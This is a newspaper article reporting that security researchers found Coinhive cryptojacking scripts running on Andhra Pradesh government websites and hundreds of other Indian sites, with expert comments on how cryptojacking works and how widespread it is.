Hack­ers Mined a For­tune from Indian Web­sites

Cryp­to­jack­ing turns AP govt sites, among hun­dreds of oth­ers into min­ing plat­forms

The Economic Times - - Disruption: Startups & Tech - Nilesh.Christo­pher @times­group.com

Ben­galuru: In­dia might have reser­va­tions about cryp­tocur­ren­cies, but gov­ern­ment web­sites in the coun­try are in­ad­ver­tently help­ing hack­ers make magic in­ter­net money off of their web­sites. Gov­ern­ment web­sites such as that of the di­rec­tor of mu­nic­i­pal ad­min­is­tra­tion of Andhra Pradesh, Tiru­pati Mu­nic­i­pal Cor­po­ra­tion and Macherla mu­nic­i­pal­ity are among hun­dreds of Indian web­sites be­ing used to mine cryp­tocur­ren­cies, an anal­y­sis by se­cu­rity re­searchers show. The mal­ware, known as cryp­to­jack­ing, is the unau­tho­rised use of some­one else’s com­puter to mine cryp­tocur­ren­cies. Hack­ers get users to click on a ma­li­cious link in an email that loads crypto min­ing code on the com­puter or in­fect a web­site with JavaScript code that mines cryp­tocur­ren­cies us­ing up a vis­i­tor’s com­put­ing power with­out con­sent.

“Hack­ers tar­get gov­ern­ment web­sites for min­ing cryp­tocur­rency be­cause those web­sites get high traf­fic and mostly peo­ple trust them,” said se­cu­rity re­searcher In­dra­jeet Bhuyan. “Ear­lier, we saw a lot of gov­ern­ment web­sites get­ting de­faced (hacked). Now, in­ject­ing cryp­to­jack­ers is more fash­ion­able as the hacker can make money.”

The vul­ner­a­bil­i­ties on the AP gov­ern­ment web­sites were first iden­ti­fied by a team of Guwahati-based se­cu­rity re­searchers Shakil Ahmed, Anish Sarma and Bhuyan. The three web­sites are sub­do­mains of ap.gov.in which is one of the most pop­u­lar web­sites glob­ally with over 1,60,000 vis­its per month.

ET reached out to JA Chowdary, IT ad­vi­sor to the chief min­is­ter of Andhra Pradesh, about the mal­wareaf­fected web­sites on Septem­ber 10. “Thanks for no­ti­fy­ing us about the AP web­site hack­ing,” said Chowdary in a re­sponse to the alert. Mails and calls to AP IT sec­re­tary Vi­jay Anand re­mained an­swered.

How­ever, as on Septem­ber 16, the web­sites con­tinue to run the scripts.

Be­sides gov­ern­ment web­sites, the mal­ware that mines cryp­tocur­ren­cies has been spread­ing and af­fect­ing en­ter­prise sys­tems as well. PublicWWW lists over 119 Indian web­sites that run coin­hive script.

Bhuyan and his team ran a soft­ware script or code on the home­pages of over 4,000 web­sites from the goidi­rec­tory.nic.in to iden­tify cryp­to­jack­ing scripts. Many of them had been taken down with­out him reach­ing out to them.

Glob­ally, cryp­to­jack­ing mal­ware grew from im­pact­ing 13% of all or­gan­i­sa­tions in Q4 of 2017 to 28% of com­pa­nies in Q1of 2018, more than dou­bling its foot­print as per a re­cent Fortinet re­port.

In March, the of­fi­cial web­site of Union min­is­ter Ravi Shankar Prasad was af­fected by the same vul­ner­a­bil­ity where it was min­ing cryp­tocur­rency Monero. The web­site was later fixed af­ter it was flagged by Fac­torDaily.

Coin­hive is one of the most pop­u­lar cryp­tocur­rency min­ing ser­vice and it is turn­ing out to be prof­itable. A small chunk of the code in­stalled on a web­site uses the com-

put­ing power of any browser that vis­its the site to mine bits of the Monero cryp­tocur­rency.

“Cryp­to­jack­ers who man­age to de­velop and main­tain a net­work of hi­jacked com­puter sys­tems are able to gen­er­ate rev­enue with a frac­tion of the ef­fort and at­ten­tion caused by ran­somware,” said Ra­jesh Mau­rya, re­gional vice-pres­i­dent, In­dia and Saarc, Fortinet.

Un­like ran­somware — a type of mal­ware de­signed to block ac­cess to a com­puter un­til a sum of money is paid — the suc­cess of cryp­to­min­ing attack de­pends on not be­ing de­tected.

RA­JESH MAU­RYA Re­gional Vice-pres­i­dent, In­dia and Saarc, Fortinet Cryp­to­jack­ers who man­age to de­velop and main­tain a net­work of hi­jacked com­puter sys­tems are able to gen­er­ate rev­enue with a frac­tion of the ef­fort and at­ten­tion caused by ran­somware

Ex­perts say the es­ti­mated rev­enue gen­er­ated through cryp­to­jack­ing de­pends on the au­di­ence, the num­ber of sys­tems com­pro­mised and how long peo­ple stay on a web­site. The more time spent while surf­ing on the site, the more CPU cy­cles that can be bor­rowed to mine cryp­tocur­ren­cies.

“Crypto min­ing ac­tiv­ity is be­com­ing a very big busi­ness in In­dia,” said Mau­rya. “This tech­nol­ogy is most ef­fec­tive on il­le­gal video-stream­ing web­sites where peo­ple stay for hours watch­ing movies or TV se­ries.” The next fron­tier for cryp­to­jack­ing is mov­ing to­wards in­ter­net of things (IoT) prod­ucts, say se­cu­rity ex­perts. De­vices like home smart speak­ers that are not used all through the day but have high pro­cess­ing power are be­ing lever­aged to mine cryp­tocur­ren­cies.

A pre­lim­i­nary search in Sho­dan.io, the search en­gine for in­ter­net-con­nected de­vices, showed that In­dia ranked sec­ond af­ter Brazil with over 13,500 home routers af­fected by cryp­to­jack­ing soft­ware.


Newspapers in English

Newspapers from India

© PressReader. All rights reserved.